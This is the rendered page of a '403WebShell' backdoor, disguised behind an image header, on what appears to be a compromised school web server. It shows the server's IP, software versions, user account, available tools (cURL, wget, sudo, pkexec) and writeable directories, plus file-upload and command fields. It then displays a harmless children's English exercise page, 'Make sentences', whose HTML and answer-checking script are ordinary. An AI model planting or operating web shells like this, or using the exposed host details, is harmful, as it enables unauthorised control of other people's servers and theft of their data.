????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.226.169.66
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelD/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelD/Category1/LevelDCat1Lesson10.html
<!doctype html>
<html>
    <head>
        <title>Make sentences</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>

        <script>

            function page_preLoad()
            {
                shared_setDeviceTypeLevelCategoryLastLesson(Level.D, Category.No1);
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.D, Category.No1, 10), true, true);
                shared_setFooterTable('id_tblFooter', true, true, true, true, true);

                var ids_headings = ['id_td_heading1'];
                var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10', 'id_td_text11', 'id_td_text12', 'id_td_text13', 'id_td_text14', 'id_td_text15', 'id_td_text16', 'id_td_text17', 'id_td_text18', 'id_td_text19', 'id_td_text20', 'id_inputAnswerForCar', 'id_inputAnswerForCorn', 'id_inputAnswerForChair', 'id_inputAnswerForJar'];

                shared_adjust_fontSize_for_ids_all_devices(ids_headings, 80);
                shared_adjust_fontSize_for_ids_all_devices(ids_texts, 80);
                
                var eInputText1 = document.getElementById('id_inputAnswerForCar');
                var eInputText2 = document.getElementById('id_inputAnswerForCorn');
                var eInputText3 = document.getElementById('id_inputAnswerForChair');
                var eInputText4 = document.getElementById('id_inputAnswerForJar');
                
                eInputText1.isCorrect == false;
                eInputText2.isCorrect == false;
                eInputText3.isCorrect == false;
                eInputText4.isCorrect == false;
            }
        
            function page_onLoad()
            {

            }
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelD');
            }
            
            function btnPrevious_click()
            {
                window.location = 'LevelDCat1Lesson09.html';
            }
            
            function btnNext_click()
            {
                window.location = 'LevelDCat1Lesson11.html';
            }
        
            function btnValidate_click()
            {
                var eInputText1 = document.getElementById('id_inputAnswerForCar');
                var eInputText2 = document.getElementById('id_inputAnswerForCorn');
                var eInputText3 = document.getElementById('id_inputAnswerForChair');
                var eInputText4 = document.getElementById('id_inputAnswerForJar');
                
                if ((eInputText1.isCorrect == true) && (eInputText2.isCorrect == true) && (eInputText3.isCorrect == true) && (eInputText4.isCorrect == true))
                {
                    shared_show_claps_animation('shared_id_div_claps_image');
                }
            }
        
            function validateSentence(id_inputAnswer, correctText)
            {
                var eInputText = document.getElementById(id_inputAnswer);
                var inputText = eInputText.value;
                var enteredTextArray = inputText.split(" ");
                var trimmedText = '';
                
                for (var textIndex = 0; textIndex < enteredTextArray.length; textIndex++)
                {
                    if (enteredTextArray[textIndex].trim() != '')
                    {
                        trimmedText += enteredTextArray[textIndex].trim() + ' ';
                    }
                }
                
                trimmedText = trimmedText.trim().toUpperCase();
                
                eInputText.isCorrect = (trimmedText == correctText) ? true : false;
            }

        </script>
    </head>

    <body onload="page_onLoad()">
        
    <div id="shared_id_div_claps_image">
    </div>
        
    <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
        <tr height="8%">
            <td>
                <div id="id_tblHeader"></div>
            </td>
        </tr>
        <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
            <td>
                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
                    <tr>
                        <td>
                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                  <tr height="5%">
                                      <td>
                                          <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                              <tr>
                                                  <td id="id_td_heading1" class="shared_style_blue_24px_bold_padding_left_2_percent" style="border-bottom: none"><u>Make sentences as shown below:</u></td>
                                              </tr>
                                          </table>
                                      </td>                    
                                  </tr>
                                  <tr height="*">
                                    <td>
                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                          <tr height="100%">
                                            <td>
                                                <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                  <tr height="100%">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                            <tr height="20%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                        <tr>
                                                                            <td width="70%">
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                                    <tr height="50%">
                                                                                        <td id="id_td_text1" width = "20%" class="shared_style_blue_24px_padding_left_2_percent" align="right">Ex:  </td>
                                                                                        <td id="id_td_text2" width = "*" class="shared_style_blue_24px_padding_left_2_percent">My <span style="color: red">shirt</span> is white.</td>
                                                                                    </tr>
                                                                                    <tr height="*">
                                                                                        <td id="id_td_text3" width="20%">&nbsp;</td>
                                                                                        <td id="id_td_text4" width="*" class="shared_style_blue_24px_padding_left_2_percent">I have a white <span style="color: red">shirt.</span></td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td width="*" align="left">
                                                                                <img id="id_imgShirt" width="45%" src="../../../img/LevelD/Category1/LevelDCat1Lesson10/shirt.png" draggable="false">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="20%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                        <tr>
                                                                            <td width="70%">
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                                    <tr height="50%">
                                                                                        <td id="id_td_text5" width = "20%" class="shared_style_blue_24px_padding_left_2_percent" align="right">1.  </td>
                                                                                        <td id="id_td_text6" width = "*" class="shared_style_blue_24px_padding_left_2_percent">My <span style="color: red">car</span> is new.</td>
                                                                                    </tr>
                                                                                    <tr height="*">
                                                                                        <td id="id_td_text7" width="20%">&nbsp;</td>
                                                                                        <td id="id_td_text8" width = "*">
                                                                                            <input id="id_inputAnswerForCar" type="text" class="shared_style_options_red" style="text-align:left; width:90%" onchange="validateSentence('id_inputAnswerForCar', 'I HAVE A NEW CAR.')">
                                                                                                </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td width="*" align="left">
                                                                                <img id="id_imgCar" width="50%" src="../../../img/LevelD/Category1/LevelDCat1Lesson10/car.png" draggable="false">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="20%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                        <tr>
                                                                            <td width="70%">
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                                    <tr height="50%">
                                                                                        <td id="id_td_text9" width = "20%" class="shared_style_blue_24px_padding_left_2_percent" align="right">2.  </td>
                                                                                        <td id="id_td_text10" width = "*" class="shared_style_blue_24px_padding_left_2_percent">My <span style="color: red">corn</span> is fresh to eat.</td>
                                                                                    </tr>
                                                                                    <tr height="*">
                                                                                        <td id="id_td_text11" width="20%">&nbsp;</td>
                                                                                        <td id="id_td_text12" width = "*">
                                                                                            <input id="id_inputAnswerForCorn" type="text" class="shared_style_options_red" style="text-align:left; width:90%" onchange="validateSentence('id_inputAnswerForCorn', 'I HAVE A FRESH CORN TO EAT.')">
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td width="*" align="left">
                                                                                <img id="id_imgCorn" width="50%" src="../../../img/LevelD/Category1/LevelDCat1Lesson10/corn.png" draggable="false">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="20%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                        <tr>
                                                                            <td width="70%">
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                                    <tr height="50%">
                                                                                        <td id="id_td_text13" width = "20%" class="shared_style_blue_24px_padding_left_2_percent" align="right">3.
                                                                                        </td>
                                                                                        <td id="id_td_text14" width = "*" class="shared_style_blue_24px_padding_left_2_percent">My <span style="color: red">chair</span> is old.</td>
                                                                                    </tr>
                                                                                    <tr height="*">
                                                                                        <td id="id_td_text15" width="20%">&nbsp;</td>
                                                                                        <td id="id_td_text16" width = "*">
                                                                                            <input id="id_inputAnswerForChair" type="text" class="shared_style_options_red" style="text-align:left; width:90%" onchange="validateSentence('id_inputAnswerForChair', 'I HAVE AN OLD CHAIR.')">
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td width="*" align="left">
                                                                                <img id="id_imgCorn" width="45%" src="../../../img/LevelD/Category1/LevelDCat1Lesson10/chair.png" draggable="false">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                        <tr>
                                                                            <td width="70%">
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
                                                                                    <tr height="50%">
                                                                                        <td id="id_td_text17" width = "20%" class="shared_style_blue_24px_padding_left_2_percent" align="right">4.
                                                                                        </td>
                                                                                        <td id="id_td_text18" width = "*" class="shared_style_blue_24px_padding_left_2_percent">My glass <span style="color: red">jar</span> is big.</td>
                                                                                    </tr>
                                                                                    <tr height="*">
                                                                                        <td id="id_td_text19" width="20%">&nbsp;</td>
                                                                                        <td id="id_td_text20" width = "*">
                                                                                            <input id="id_inputAnswerForJar" type="text" class="shared_style_options_red" style="text-align:left; width:90%" onchange="validateSentence('id_inputAnswerForJar', 'I HAVE A BIG GLASS JAR.')">
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td width="*" align="left">
                                                                                <img id="id_imgChair" width="40%" src="../../../img/LevelD/Category1/LevelDCat1Lesson10/jar.png" draggable="false">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                  </tr>
                                               </table>
                                            </td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                            </table>
                        </td>
                    </tr>
                </table>                
            </td>
        </tr>
        <tr height="8%">
            <td>
                <div id="id_tblFooter"></div>
            </td>
        </tr>
    </table>

    <script>
        page_preLoad();
    </script>

    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit